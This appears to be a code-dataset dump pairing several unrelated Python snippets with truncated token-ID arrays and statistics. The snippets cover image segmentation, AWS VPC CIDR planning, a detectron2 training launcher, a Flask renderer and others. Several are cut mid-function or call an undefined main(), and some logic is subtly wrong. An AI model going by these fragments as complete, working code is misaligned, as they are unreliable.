get_centre(nbr_list_red, x_centre, y_centre, 1, 2, im_red) # optimum value (tunable)
get_centre(nbr_list_green, x_centre, y_centre, 1, 2, im_green)
get_centre(nbr_list_blue, x_centre, y_centre, 1, 2, im_blue)
## nbr_list_red = np.array(nbr_list_red)
## nbr_list_green = np.array(nbr_list_green)
## nbr_list_blue = np.array(nbr_list_blue)
############################################################################################################################################################
## Perform background extraction (US Patent)
red_avg = np.mean(nbr_list_red[:])
green_avg = np.mean(nbr_list_green[:])
blue_avg = np.mean(nbr_list_blue[:])
im_red_back = im_red.copy()
im_green_back = im_green.copy()
im_blue_back = im_blue.copy()
# tunable parameters
sub_backgnd(im_red_back, im_green_back, im_blue_back, 1.2) # *1.15 or 1.2 - best results with LCN
## im_back = dstack([im_red_back, im_green_back, im_blue_back])
############################################################################################################################################################
## Convert image (current and background) from RGB to YCbCr and create HSI model
# RGB to YCbCr
im_y, im_cb, im_cr = rgb2ycbcr(im_red, im_green, im_blue)
im_y_back, im_cb_back, im_cr_back = rgb2ycbcr(im_red_back, im_green_back, im_blue_back)
im_int, im_hue, im_sat = ycbcr2hsi(im_y, im_cb, im_cr)
im_int_back, im_hue_back, im_sat_back = ycbcr2hsi(im_y_back, im_cb_back, im_cr_back)
# Create image differences
im_int_diff = abs(im_int - im_int_back) # gives you an inverted image :(
im_hue_diff = abs(im_hue - im_hue_back)
im_sat_diff = abs(im_sat - im_sat_back)
## Histogram plotting (no need to consider neighbouring pixels)
pixels_int, pixels_hue, pixels_sat = [], [], []
# omit the corresponding width and centre variables from below if these are commented out above
hist_int, bins_int, width_int, centre_int = create_hist(pixels_int, im_int_diff)
hist_hue, bins_hue, width_hue, centre_hue = create_hist(pixels_hue, im_hue_diff)
hist_sat, bins_sat, width_sat, centre_sat = create_hist(pixels_sat, im_sat_diff)
## ADAPTIVE THRESHOLDING (see patent for algorithm)
# Set threshold to the default value bin
N1, search_thresh_int = adaptive_thresh(hist_int, bins_int)
N2, search_thresh_hue = adaptive_thresh(hist_hue, bins_hue)
N3, search_thresh_sat = adaptive_thresh(hist_sat, bins_sat)
## The last words (binary thresholding, morphological operations and connected-components labelling)
inty, hue, sat = im_int_diff.copy(), im_hue_diff.copy(), im_sat_diff.copy()
inty[:,:][inty[:,:] <= search_thresh_int] = False #True
inty[:,:][inty[:,:] > search_thresh_int] = True #False
hue[:,:][hue[:,:] <= search_thresh_hue] = False #True
hue[:,:][hue[:,:] > search_thresh_hue] = True #False
sat[:,:][sat[:,:] <= search_thresh_sat] = False #True
sat[:,:][sat[:,:] > search_thresh_sat] = True #False
im_combinedOR = np.logical_or(inty, hue, sat)
open_img = ndimage.binary_opening(im_combinedOR, structure = np.ones((2,2)).astype(np.int)) # works best
close_img = ndimage.binary_closing(open_img) # open_img
mask = close_img > close_img.mean()
label_im, nb_labels = ndimage.label(mask)
sizes = ndimage.sum(mask, label_im, range(nb_labels + 1))
mask_size = sizes < 10
remove_pixel = mask_size[label_im]
label_im[remove_pixel] = False
im_label = np.array(label_im > 0, dtype = uint8) # plotting is weird, probably due to dtype conversion
cnt, hierarchy = cv2.findContours(im_label,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
if shape(cnt)[0] > 1:
print 'too many contours in ', img_list[z], 'id# ', ins
continue
elif shape(cnt)[1] < 5:
print 'rectangular contour; possible reason: region too noisy; image# ', img_list[z], 'id# ', ins
continue
else:
#### FEATURE EXTRACTION ####
### Colour-based features
## im_gray = cv2.cvtColor(im_org, cv2.COLOR_BGR2GRAY)
for h, cntr in enumerate(cnt):
mask = np.zeros(im_int.shape, np.uint8)
cv2.drawContours(mask,[cntr],0,255,-1)
mean = cv2.mean(im_int, mask = mask)
find = np.where(mask > 0)
x_axis = find[1][:]
y_axis = find[0][:]
## Average intensity
intensity = []
avg_intensity = avg_int(intensity, im_int, x_axis, y_axis)
## Intensity histogram
pixels = []
hist, bins, width, centre = create_hist(pixels, im_int, x_axis, y_axis)
## plt.bar(centre, hist, align = 'center', width = width)
## ax = plt.gca()
## ax.set_xlim((0,255))
## plt.show()
### Conotur-based features
area = cv2.contourArea(cnt[0]) # Area
perimeter = cv2.arcLength(cnt[0], True) # Perimeter
ellipse = cv2.fitEllipse(cnt[0])
(centre, axes, orientation) = ellipse
length = max(axes) # Length
width = min(axes) # Width
circular_fitness = (4*pi*area)/np.square(perimeter) # Circular fitness
elongation = length/width # Elongation
## print 'area = ' , area
## print 'perimeter = ' , perimeter
## print 'length = ' , length
## print 'width = ' , width
## print 'circular_fitness = ' , circular_fitness
## print 'elongation = ' , elongation
## print 'average intensity = ' , avg_intensity
## print 'intensity histogram = ' , hist
feature_dict = {'area': area, 'perimeter': perimeter, 'length': length, 'width': width, 'circular_fitness': circular_fitness, 'elongation': elongation, 'average intensity': avg_intensity, 'intensity histogram': hist}
feature_database.append(feature_dict)
feature_database_TrainingSet = np.array(feature_database)
print time.time() - start_time, "seconds --> Execution time"
| [
9688,
62,
2435,
796,
640,
13,
2435,
3419,
198,
198,
2235,
10714,
47011,
14435,
1634,
198,
198,
4299,
300,
31522,
62,
17,
67,
7,
320,
11,
43237,
5356,
41888,
16,
13,
48952,
11,
352,
13,
48952,
60,
2599,
198,
220,
220,
220,
37227,
2... | 2.110898 | 5,744 |
import argparse
import ipaddress
from sys import stderr
import boto3
from pkg_resources import get_distribution, DistributionNotFound
try:
from pyvpc_cidr_block import PyVPCBlock, return_pyvpc_objects_string, return_pyvpc_objects_json
except ModuleNotFoundError:
from .pyvpc_cidr_block import PyVPCBlock, return_pyvpc_objects_string, return_pyvpc_objects_json
def get_aws_regions_list():
"""
Get a list of AWS regions, uses:
https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html#EC2.Client.describe_regions
Return a list of strings with all available regions
:return: list
"""
regions = boto3.client('ec2').describe_regions()['Regions']
regions_list = []
for region in regions:
regions_list.append(region['RegionName'])
return regions_list
def get_aws_vpc_if_exists(vpc_id_name, aws_region=None):
"""
Return reserved subnets, in input vpc
if first response successful, using vpc-id filter return the vpc-id found,
if vpc not found by its id, make second call using name filter,
return error if more then one vpc has same name
:param vpc_id_name: string
:param aws_region: string
:return: PyVPCBlock object
"""
response = boto3.client('ec2', region_name=aws_region).describe_vpcs(
Filters=[
{
'Name': 'vpc-id',
'Values': [
vpc_id_name,
]
},
],
)['Vpcs']
if response:
vpc_cidr = ipaddress.ip_network(response[0]['CidrBlock'])
vpc_id = response[0]['VpcId']
vpc_name = get_aws_resource_name(response[0])
return PyVPCBlock(network=vpc_cidr, resource_id=vpc_id, name=vpc_name, resource_type='vpc')
# In case no VPC found using vpc-id filter, try using input as name filter
response = boto3.client('ec2', region_name=aws_region).describe_vpcs(
Filters=[
{
'Name': 'tag:Name',
'Values': [
vpc_id_name,
]
},
],
)['Vpcs']
# There is a single vpc with 'vpc_id_name'
if len(response) == 1:
vpc_cidr = ipaddress.ip_network(response[0]['CidrBlock'])
vpc_id = response[0]['VpcId']
vpc_name = get_aws_resource_name(response[0])
return PyVPCBlock(network=vpc_cidr, resource_id=vpc_id, name=vpc_name, resource_type='vpc')
# Is case there are multiple VPCs with the same name, raise exception
elif len(response) > 1:
found = []
for x in response:
found.append(x['VpcId'])
raise ValueError("more then one vpc found with name {} - {}".format(vpc_id_name, str(found)))
# Nothing found
return None
def get_aws_reserved_subnets(vpc_id, aws_region=None):
"""
Get a list of AWS subnets of a given VPC
:param vpc_id: string
:param aws_region: string
:return: list of PyVPCBlock objects
"""
response = boto3.client('ec2', region_name=aws_region).describe_subnets(
Filters=[
{
'Name': 'vpc-id',
'Values': [
vpc_id,
]
}
])['Subnets']
reserved_subnets = []
for subnet in response:
reserved_subnets.append(PyVPCBlock(network=ipaddress.ip_network(subnet['CidrBlock']),
resource_id=subnet['SubnetId'],
name=get_aws_resource_name(subnet),
resource_type='subnet'))
return reserved_subnets
def get_aws_reserved_networks(region=None, all_regions=False):
"""
Get a list of AWS cidr networks that are already used in input region,
or get all vpc(s) from all available regions if all_regions is True, uses:
https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html#EC2.Client.describe_vpcs
:param region: string
:param all_regions: boolean
:return: list of PyVPCBlock objects
"""
result = []
if all_regions:
for aws_region in get_aws_regions_list():
for vpc in boto3.client('ec2', region_name=aws_region).describe_vpcs()['Vpcs']:
result.append(vpc)
else:
result = boto3.client('ec2', region_name=region).describe_vpcs()['Vpcs']
vpc_used_cidr_list = []
for vpc in result:
vpc_used_cidr_list.append(PyVPCBlock(network=ipaddress.ip_network(vpc['CidrBlock']),
resource_id=vpc['VpcId'],
name=get_aws_resource_name(vpc),
resource_type='vpc'))
return vpc_used_cidr_list
def calculate_overlap_ranges(network, reserved_network):
"""
Function will calculate all available ranges of over lapping network, all possible scenarios demonstrates below.
There are exactly 4 possible scenarios:
10.10.0.0
10.8.0.0/14 | 10.11.255.255
| | |
network -> *--------------------------------------*
|################|
reserved -> |------------|----------------|
network | ^ |
10.5.0.0 | 10.9.255.255
10.7.255.255
10.10.0.0/16 10.10.255.255
| |
network -> *---------------|-----------------------------|---------------|
|#############################|
reserved -> |-----------------------------|
network | |
10.10.50.0/24 10.10.50.255
10.10.50.0/24 10.10.255.255
| |
network -> *-----------|-----------|
|###########|
reserved -> |-----------|-----------------------|
network | |
10.10.0.0/16 10.10.50.255
:param network:
:param reserved_network:
:return:
"""
if network.overlaps(reserved_network):
ranges = []
# If the lower boundary of current head is smaller than the lower boundary of reserved_network
# It means the 'reserved_network' network is necessarily from 'the right' of head, and its available
if network[0] < reserved_network[0]:
ranges.append({'lower_ip': network[0], 'upper_ip': reserved_network[0] - 1, 'available': True})
# Append the overlapping network as NOT available
ranges.append({'lower_ip': reserved_network[0], 'upper_ip': reserved_network[-1], 'available': False})
if reserved_network[-1] < network[-1]:
ranges.append({'lower_ip': reserved_network[-1] + 1, 'upper_ip': network[-1], 'available': True})
return ranges
else:
return [{'lower_ip': network[0], 'upper_ip': network[-1], 'available': True}]
def get_available_networks(desired_cidr, reserved_networks):
"""
This function can be complex to understand without debugging,
an example with
'desired_cidr=10.0.0.0/8' and
'reserved_networks=[IPv4Network('10.8.0.0/1'), IPv4Network('10.10.0.0/16'), IPv4Network('10.50.0.0/16')]'
will be shown as comments
(head) 10.10.0.0/16 (tail)
10.0.0.0/8 | 10.10.255.255/16 10.255.255.255
| | | |
(1) desired_cidr (10.0.0.0/8) -> *----|--------|------------|---------|--------|------------|-------------|
|#######^|############|^########| |############|
(2) reserved_net (10.10.0.0/16) -> |#######||------------||########| |############|
|#######|##############|########| |############|
(3) reserved_net (10.50.0.0/16) -> |#######|##############|########| |------------|
|#######|##############|########| | |
(4) reserved_net (10.10.0.0/14) -> |-------|--------------|--------| | |
10.8.0.0/14 | | 10.11.255.255 | |
| | | |
10.9.255.255/16 10.11.0.0/16 | |
10.50.0.0/16 10.50.255.255
So in this example there should be 3 available ranges, and 3 reserved ranges (marked with #)
Printed output should be:
| Lowest IP | Upper IP | Num of Addr | Available | ID | Name |
|-------------|----------------|---------------|-------------|-----------------------|---------------|
| 10.0.0.0 | 10.7.255.255 | 524288 | True | | |
| 10.8.0.0 | 10.11.255.255 | 262144 | False | vpc-vxx3X5hzPNk9Jws9G | alpha |
| 10.10.0.0 | 10.10.255.255 | 65536 | False | vpc-npGac6CHRJE2JakNZ | dev-k8s |
| 10.12.0.0 | 10.49.255.255 | 2490368 | True | | |
| 10.50.0.0 | 10.50.255.255 | 65536 | False | vpc-f8Sbkd2jSLQF6x9Qd | arie-test-vpc |
| 10.51.0.0 | 10.255.255.255 | 13434880 | True | | |
:param desired_cidr: IPv4Network
:param reserved_networks: list of PyVPCBlock objects
:return: list of PyVPCBlock objects
"""
# If there are no reserved networks, then return that all 'desired_cidr' (Network Object) range is available
if not reserved_networks:
# Since there are no reserved network, the lower, and upper boundary of the 'desired_cidr' can be used
return [PyVPCBlock(network=desired_cidr, block_available=True)]
# in order to find/calculate available networks, reduce list of networks to only overlapping networks
overlapping_networks = []
for reserved_net in reserved_networks:
if desired_cidr.overlaps(reserved_net.get_network()):
# need to figure out how the reserved network is 'blocking' the desired cidr
overlapping_networks.append(reserved_net)
# If overlapping_networks is empty, then there where reserved networks, but did not overlapped
if not overlapping_networks:
return [PyVPCBlock(network=desired_cidr, block_available=True)]
# Sort PyVPCBlock objects (overlapping networks) by the 'network' field, so it will be easier to calculate
overlapping_networks = sorted(overlapping_networks, key=lambda x: x.network, reverse=False)
networks_result = []
range_head = desired_cidr[0] # Mark the start of calculation at the HEAD (view details above) point
range_tail = desired_cidr[-1] # Mark the end of calculation at the TAIL (view details above) point
# Iterate over the overlapping networks
for reserved_net in overlapping_networks:
# If the lower boundary of current range_head is smaller than the lower boundary of reserved_net
# It means the 'reserved_net' network is necessarily from 'the right' of range_head, and its available
if range_head < reserved_net.get_start_address():
networks_result.append(PyVPCBlock(start_address=range_head,
end_address=reserved_net.get_start_address() - 1,
block_available=True,
resource_type='available block'))
# Append the overlapping network as NOT available
networks_result.append(PyVPCBlock(network=reserved_net.get_network(), resource_id=reserved_net.get_id(),
name=reserved_net.get_name()))
# If the most upper address of current reserved_net (that is overlapping the desired_cidr),
# is larger/equal than the most upper address of desired_cidr, then there is no point perform calculations
if reserved_net.get_end_address() >= range_tail:
break
else: # Else there might be other overlapping networks,
# head should always point to the next lower available address
# so only if current head is "from the left" of most upper overlapping network, set it as new head,
# As there might be a case of an inner network, see reserved_net (2) for details
if range_head < reserved_net.get_end_address():
# Set the new range_head value, to one ip address above the upper boundary of reserved_net
range_head = reserved_net.get_end_address() + 1
# If last iteration (here are no more overlapping networks, until the 'range_tail' address)
if overlapping_networks.index(reserved_net) == len(overlapping_networks) - 1:
networks_result.append(PyVPCBlock(start_address=range_head,
end_address=range_tail,
block_available=True))
return networks_result
def calculate_suggested_cidr(ranges, prefix, minimal_num_of_addr):
"""
Get available CIDR (network object), among input ip ranges, according requirements
Example:
Input ranges are:
| Lowest IP | Upper IP | Num of Addr | Available | ID | Name |
|-------------|----------------|---------------|-------------|-----------------------|---------------|
| 10.0.0.0 | 10.7.255.255 | 524288 | True | | |
| 10.8.0.0 | 10.11.255.255 | 262144 | False | vpc-vxx3X5hzPNk9Jws9G | alpha |
| 10.10.0.0 | 10.10.255.255 | 65536 | False | vpc-npGac6CHRJE2JakNZ | dev-k8s |
| 10.12.0.0 | 10.49.255.255 | 2490368 | True | | |
| 10.50.0.0 | 10.50.255.255 | 65536 | False | vpc-f8Sbkd2jSLQF6x9Qd | arie-test-vpc |
| 10.51.0.0 | 10.255.255.255 | 13434880 | True | | |
function will iterate over all these ranges (lower - upper ip),
and inspect only those that have the Available: True value,
if minimal_num_of_addr param passed, return the first network that has enough addresses
if prefix param passed, return first available network with input prefix
if non of the above passed, return the first available network found
:param ranges: list of PyVPCBlock objects
:param prefix: int
:param minimal_num_of_addr: int
:return: IPv4Network object
"""
possible_subnets = []
# For each PyVPCBlock object (available or not)
for net_range in ranges:
# Only if available block found, there is logic to continue
if net_range.block_available:
possible_networks = []
# The summarize_address_range function will return a list of IPv4Network objects,
# Docs at https://docs.python.org/3/library/ipaddress.html#ipaddress.summarize_address_range
net_cidr = ipaddress.summarize_address_range(net_range.get_start_address(), net_range.get_end_address())
try: # Convert start/end IPs to possible CIDRs,
for net in net_cidr:
possible_networks.append(net) # appending IPv4Network objects
except TypeError as exc:
raise TypeError('error converting {} and {} to cidr, '.format(net_range.get_start_address(),
net_range.get_end_address()) + str(exc))
except ValueError as exc:
raise TypeError('error converting {} and {} to cidr, '.format(net_range.get_start_address(),
net_range.get_end_address()) + str(exc))
for network in possible_networks:
# In case a minimal number of addresses requested
if minimal_num_of_addr:
if minimal_num_of_addr <= network.num_addresses:
possible_subnets.append(PyVPCBlock(network=network, block_available=True))
# Return first available network with input suffix
elif prefix:
try:
network_subnets = network.subnets(new_prefix=prefix)
for sub in network_subnets:
possible_subnets.append(PyVPCBlock(network=sub, block_available=True))
except ValueError as exc:
raise ValueError(str(exc) + ', lowest ip examined range is {}, but prefix was {}'
.format(network, prefix))
# No prefix or minimal num of addresses requested
else:
possible_subnets.append(PyVPCBlock(network=network, block_available=True))
# If empty, then no suitable range found (or all are overlapping, or there are not enough ip addresses requested)
# return list of PyVPCBlock objects
return possible_subnets
def check_valid_ip_int(value):
"""
Validate that value is an integer between 0 to 340,282,366,920,938,463,463,374,607,431,768,211,455
IPv4 0 to 4,294,967,295
IPv6 4,294,967,296 to 340,282,366,920,938,463,463,374,607,431,768,211,455
:param value: int
:return: int
"""
try:
address = int(value)
except ValueError:
raise argparse.ArgumentTypeError('value is not a positive number: {}'.format(value))
try:
ipaddress.ip_address(address)
except ValueError:
raise argparse.ArgumentTypeError('is out of IPv4/IPv6 boundaries')
return address
def check_valid_ip_prefix(value):
"""
Validate that value is an integer between 0 to 32
:param value: int
:return: int
"""
prefix = int(value)
if prefix < 0 or prefix > 32:
raise argparse.ArgumentTypeError('{} is an invalid IPv4 prefix'.format(prefix))
return prefix
def get_self_version(dist_name):
    """
    Look up the installed version of the given distribution name.

    Falls back to a human-readable marker when the distribution is not
    installed.

    :param dist_name: string
    :return: version as string
    """
    try:
        dist = get_distribution(dist_name)
    except DistributionNotFound:
        return 'version not found'
    return dist.version
if __name__ == "__main__":
    # Script entry point -- main() is presumably defined earlier in this
    # module (not visible in this chunk); confirm.
    main()
| [
11748,
1822,
29572,
198,
11748,
20966,
21975,
198,
6738,
25064,
1330,
336,
1082,
81,
198,
198,
11748,
275,
2069,
18,
198,
6738,
279,
10025,
62,
37540,
1330,
651,
62,
17080,
3890,
11,
27484,
3673,
21077,
198,
198,
28311,
25,
198,
220,
... | 2.03496 | 9,611 |
# Read unique integers from the user until they answer 'N', then show them
# sorted. Duplicate values are rejected with an error message.
numeros = []
contador = 1
resposta = 'S'
while resposta != 'N':
    numero = int(input(f'{contador} Número: '))
    if numero in numeros:
        # Duplicate: reject and keep the counter unchanged.
        print('Erro! Valor duplicado.')
        print('')
    else:
        numeros.append(numero)
        print('Valor adicionado com sucesso!')
        contador += 1
        print(' ')
    resposta = input('Deseja continuar? [S/N] ').upper()
    print('')
numeros.sort()
print('-' * 30)
print(f'Os valores digitados foi: {numeros}')
| [
2100,
2850,
796,
17635,
201,
198,
66,
796,
352,
201,
198,
18487,
84,
283,
796,
705,
50,
6,
201,
198,
4514,
11143,
283,
14512,
705,
45,
10354,
201,
198,
220,
220,
220,
1188,
273,
796,
493,
7,
15414,
7,
69,
6,
90,
66,
92,
399,
2... | 1.983264 | 239 |
#!/usr/bin/python
class Car(object):
	"""A generic car; base type for more specific vehicles."""
class Truck(Car):
	"""A truck; a specialized kind of Car."""
# This is the standard boilerplate that calls the main() function.
# NOTE(review): no main() is defined in this file as shown -- running this
# script would raise NameError; confirm main() exists or add one.
if __name__ == '__main__':
  main()
2,
48443,
14629,
14,
8800,
14,
29412,
198,
198,
4871,
1879,
7,
15252,
2599,
198,
197,
37811,
15390,
8841,
329,
1879,
37811,
198,
198,
4871,
24892,
7,
9914,
2599,
198,
197,
37811,
15390,
8841,
329,
24892,
37811,
198,
198,
2,
770,
318,
... | 3.117647 | 68 |
from functools import partial
from typing import (Any,
Tuple)
from .hints import Predicate
def instance_of(*types: type) -> Predicate:
    """
    Builds a predicate answering whether an object is an instance of any
    of the supplied types.

    >>> is_any_string = instance_of(str, bytes, bytearray)
    >>> is_any_string(b'')
    True
    >>> is_any_string('')
    True
    >>> is_any_string(1)
    False
    """
    predicate = partial(is_instance_of,
                        types=types)
    # Give the partial a descriptive dunder name and docstring so it behaves
    # like a hand-written predicate in tracebacks and help().
    joined_names = '_or_'.join(cls.__name__ for cls in types)
    predicate.__name__ = predicate.__qualname__ = 'is_instance_of_' + joined_names
    quoted_names = '", "'.join(cls.__qualname__ for cls in types)
    predicate.__doc__ = ('Checks if given object is instance '
                         'of one of types: "{}".'.format(quoted_names))
    return predicate
def subclass_of(*types: type) -> Predicate:
    """
    Builds a predicate answering whether a type is a subclass of any
    of the supplied types.

    >>> is_metaclass = subclass_of(type)
    >>> is_metaclass(type)
    True
    >>> is_metaclass(object)
    False
    """
    predicate = partial(is_subclass_of,
                        types=types)
    # Give the partial a descriptive dunder name and docstring so it behaves
    # like a hand-written predicate in tracebacks and help().
    joined_names = '_or_'.join(cls.__name__ for cls in types)
    predicate.__name__ = predicate.__qualname__ = 'is_subclass_of_' + joined_names
    quoted_names = '", "'.join(cls.__qualname__ for cls in types)
    predicate.__doc__ = ('Checks if given type is subclass '
                         'of one of types: "{}".'.format(quoted_names))
    return predicate
| [
6738,
1257,
310,
10141,
1330,
13027,
198,
6738,
19720,
1330,
357,
7149,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
309,
29291,
8,
198,
198,
6738,
764,
71,
29503,
1330,
1... | 2.099075 | 757 |
"""
1.
This stores many different modification display methods, and all modifications will be retrieved from here.
Shorthand:
Spectronaut -> SN
"""
class ModType(BasicModInfo):
"""
    Spectronaut version 12 has a different modification display type.
The default version is set to 12, which uses the new modification display method.
The version should be set in each main functions but not the functions that are used frequently.
"""
@staticmethod
| [
37811,
198,
16,
13,
198,
1212,
7000,
867,
1180,
17613,
3359,
5050,
11,
290,
477,
262,
17613,
481,
307,
1392,
422,
994,
13,
198,
198,
2484,
1506,
392,
25,
198,
49738,
1313,
2306,
4613,
11346,
198,
198,
37811,
628,
198,
198,
4871,
340... | 3.755725 | 131 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from bs4 import BeautifulSoup
from anime import Anime
class AnimeList():
    """Represents a user's anime list and the filtering operations on it."""

    def get_anime_data(self, include_ptw, exclude_animes_from_file,
                       excluded_animes):
        """Parse the animelist content and return basic anime data.

        Returns entries containing anime_title, anime_id,
        anime_url, anime_status.
        """
        self.parser.feed(self.content)
        # Optionally drop plan-to-watch entries.
        if not include_ptw:
            self.exclude_animes_by_status(MalStatusNamespace.ptw)
        # Optionally drop explicitly excluded titles.
        if excluded_animes:
            self.exclude_animes_by_titles(excluded_animes)
        # Optionally drop titles listed in a tab-separated file
        # (title expected in the second column).
        if exclude_animes_from_file:
            with open(exclude_animes_from_file, 'r',
                      encoding='utf-8') as source:
                titles_to_drop = {row.split('\t')[1] for row in source}
            self.exclude_animes_by_titles(titles_to_drop)
        return self.parser.anime_data

    def get_list_of_animes(self):
        """Return a list of Anime built from the animelist content."""
        collected = []
        for entry in self.anime_data:
            print(entry['anime_title'].encode('utf-8'))
            collected.append(Anime.from_dict(entry))
        return collected

    def exclude_animes_by_status(self, excluded_status):
        """Drop animes from self.parser.anime_data whose status equals
        excluded_status.
        """
        self.parser.anime_data = [
            anime for anime in self.parser.anime_data
            if anime['anime_status'] != excluded_status
        ]

    def exclude_animes_by_titles(self, animes_title_to_exclude):
        """Drop animes from self.parser.anime_data whose title appears in
        animes_title_to_exclude.
        """
        self.parser.anime_data = [
            anime for anime in self.parser.anime_data
            if anime['anime_title'] not in animes_title_to_exclude
        ]
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
201,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
201,
198,
201,
198,
201,
198,
6738,
275,
82,
19,
1330,
23762,
50,
10486,
201,
198,
201,
198,
6738,
11984,
1330,
27812... | 2.025415 | 1,023 |
#!/usr/bin/env python
"""
Detection Training Script for CoaT.
This script is a modified version of the training script in detectron2/projects/TridentNet
"""
import os
from detectron2.checkpoint import DetectionCheckpointer
from detectron2.config import get_cfg
from detectron2.engine import DefaultTrainer, default_argument_parser, default_setup, launch
from detectron2.evaluation import COCOEvaluator
from coat import add_coat_config
def setup(args):
    """
    Build the detectron2/CoaT config from the CLI arguments and run the
    default setup steps.
    """
    config = get_cfg()
    add_coat_config(config)
    config.merge_from_file(args.config_file)
    config.merge_from_list(args.opts)
    config.freeze()
    default_setup(config, args)
    return config
if __name__ == "__main__":
    parser = default_argument_parser()
    parser.add_argument("--debug", action="store_true", help="enable debug mode")
    args = parser.parse_args()
    print("Command Line Args:", args)
    if args.debug:
        # Optional remote-debug hook: start a debugpy server on port 9310 and
        # block until a client attaches.
        import debugpy
        print("Enabling attach starts.")
        debugpy.listen(address=('0.0.0.0', 9310))
        debugpy.wait_for_client()
        print("Enabling attach ends.")
    # NOTE(review): `main` is not defined anywhere in this file as shown --
    # presumably the training entry point was removed or lives elsewhere;
    # verify before running.
    launch(
        main,
        args.num_gpus,
        num_machines=args.num_machines,
        machine_rank=args.machine_rank,
        dist_url=args.dist_url,
        args=(args,),
    )
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
198,
37811,
198,
11242,
3213,
13614,
12327,
329,
1766,
64,
51,
13,
198,
198,
1212,
4226,
318,
257,
9518,
2196,
286,
262,
3047,
4226,
287,
4886,
1313,
17,
14,
42068,
14,
2898,
738,
79... | 2.524809 | 524 |
import os
import pprint
import sys
import hydra
import pandas as pd
from hydra.utils import instantiate
from omegaconf import DictConfig, OmegaConf
sys.path.append("src/")
@hydra.main(config_path="../../config", config_name="default")
if __name__ == "__main__":
    # NOTE(review): main() is not defined in this file as shown -- the
    # @hydra.main-decorated function above appears to be missing its body;
    # confirm the entry point exists.
    main()
| [
11748,
28686,
198,
11748,
279,
4798,
198,
11748,
25064,
198,
198,
11748,
25039,
198,
11748,
19798,
292,
355,
279,
67,
198,
6738,
25039,
13,
26791,
1330,
9113,
9386,
198,
6738,
267,
28917,
7807,
69,
1330,
360,
713,
16934,
11,
19839,
1854... | 3 | 93 |
'''
Created on Mar 13, 2020
@author: ballance
'''
from ucis.cover_type import CoverType
| [
7061,
6,
198,
41972,
319,
1526,
1511,
11,
12131,
198,
198,
31,
9800,
25,
2613,
590,
198,
7061,
6,
198,
6738,
334,
66,
271,
13,
9631,
62,
4906,
1330,
17546,
6030,
198,
220,
220,
220,
220
] | 2.583333 | 36 |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
from flask import render_template
__author__ = 'Ondřej Lanč'
class Renderer(object):
    """class for render package elements

    Renders configuration-package entries to HTML via Flask templates,
    dispatching on each entry's concrete class name.
    """

    def entry_render(self, entry):
        """Base render method; renders any supported type of entry.

        :param entry: entry for rendering
        :return: rendered entry, or None for unknown entry types
        """
        # Dispatch on the entry's class name via the self.render mapping.
        # NOTE(review): self.render is never assigned inside this class --
        # presumably it is populated externally or by a subclass; verify.
        try:
            return self.render[type(entry).__name__](entry)
        except KeyError:
            # Unknown entry types are silently skipped.
            return None

    def render_container(self, container):
        """render container

        :param container: container for render
        :return: renderer container
        """
        # Render every child entry first, then wrap them all in the
        # container template.
        entries = []
        for entry in container.entries.values():
            entries.append(self.entry_render(entry))
        return render_template('package/entries/container.html',
                               name=container.name,
                               full_name=container.full_name,
                               label=container.label,
                               help=container.help,
                               inconsistent=container.inconsistent,
                               entries=entries)

    @staticmethod
    def render_bool(entry):
        """render entry

        :param entry: bool keyword
        :return: renderer entry
        """
        return render_template('package/entries/bool.html',
                               name=entry.name,
                               full_name=entry.full_name,
                               label=entry.label,
                               help=entry.help,
                               inconsistent=entry.inconsistent,
                               value=entry.value,
                               )

    @staticmethod
    def render_number(entry):
        """render entry

        :param entry: number keyword
        :return: renderer entry
        """
        # Numbers additionally carry step/min/max constraints for the input.
        return render_template('package/entries/number.html',
                               name=entry.name,
                               full_name=entry.full_name,
                               label=entry.label,
                               help=entry.help,
                               inconsistent=entry.inconsistent,
                               value=entry.value,
                               step=entry.step,
                               min=entry.min,
                               max=entry.max,
                               )

    @staticmethod
    def render_string(entry):
        """render entry

        :param entry: string keyword
        :return: renderer entry
        """
        # A fixed value list without user-supplied values is rendered with
        # the select template; otherwise the free-text string template is
        # used (which also gets the validation regexp).
        if entry.list and not entry.user_values:
            return render_template('package/entries/select.html',
                                   name=entry.name,
                                   full_name=entry.full_name,
                                   label=entry.label,
                                   help=entry.help,
                                   inconsistent=entry.inconsistent,
                                   value=entry.value,
                                   list=entry.list,
                                   )
        return render_template('package/entries/string.html',
                               name=entry.name,
                               full_name=entry.full_name,
                               label=entry.label,
                               help=entry.help,
                               inconsistent=entry.inconsistent,
                               value=entry.value,
                               list=entry.list,
                               regexp=entry.reg_exp,
                               )

    @staticmethod
    def render_multiple_container(container):
        """render entry

        :param container: container entry
        :return: renderer container
        """
        # Each child becomes a tuple:
        # (index, primary value, full name, inconsistency flag).
        entries = [(i, container.primary_value(i), entry.full_name,
                    entry.inconsistent)
                   for i, entry in enumerate(container.entries)]
        return render_template('package/entries/multiple_cont.html',
                               name=container.name,
                               full_name=container.full_name,
                               inconsistent=container.inconsistent,
                               label=container.label,
                               help=container.help,
                               entries=entries,
                               max=container.multiple_max,
                               min=container.multiple_min,
                               )

    def render_multiple_key_word(self, mult_entry):
        """render entry

        :param mult_entry: Multiple keyword
        :return: renderer entry
        """
        # Unlike render_multiple_container, children are fully rendered here:
        # (index, name, rendered HTML, inconsistency flag).
        entries = [
            (i, entry.name, self.entry_render(entry), entry.inconsistent)
            for i, entry in enumerate(mult_entry.entries)]
        return render_template('package/entries/multiple_key.html',
                               name=mult_entry.name,
                               full_name=mult_entry.full_name,
                               inconsistent=mult_entry.inconsistent,
                               label=mult_entry.label,
                               help=mult_entry.help,
                               entries=entries,
                               max=mult_entry.multiple_max,
                               min=mult_entry.multiple_min,
                               )

    def render_section(self, section):
        """render section

        :param section: Section entry
        :return: renderer section
        """
        entries = []
        for entry in section.entries:
            entries.append(self.entry_render(entry))
        return render_template('package/entries/section.html',
                               full_name=section.full_name,
                               label=section.label,
                               description=section.description,
                               inconsistent=section.inconsistent,
                               entries=entries,
                               )

    def render_modal(self, entry):
        """render section

        :param entry: container entry for modal
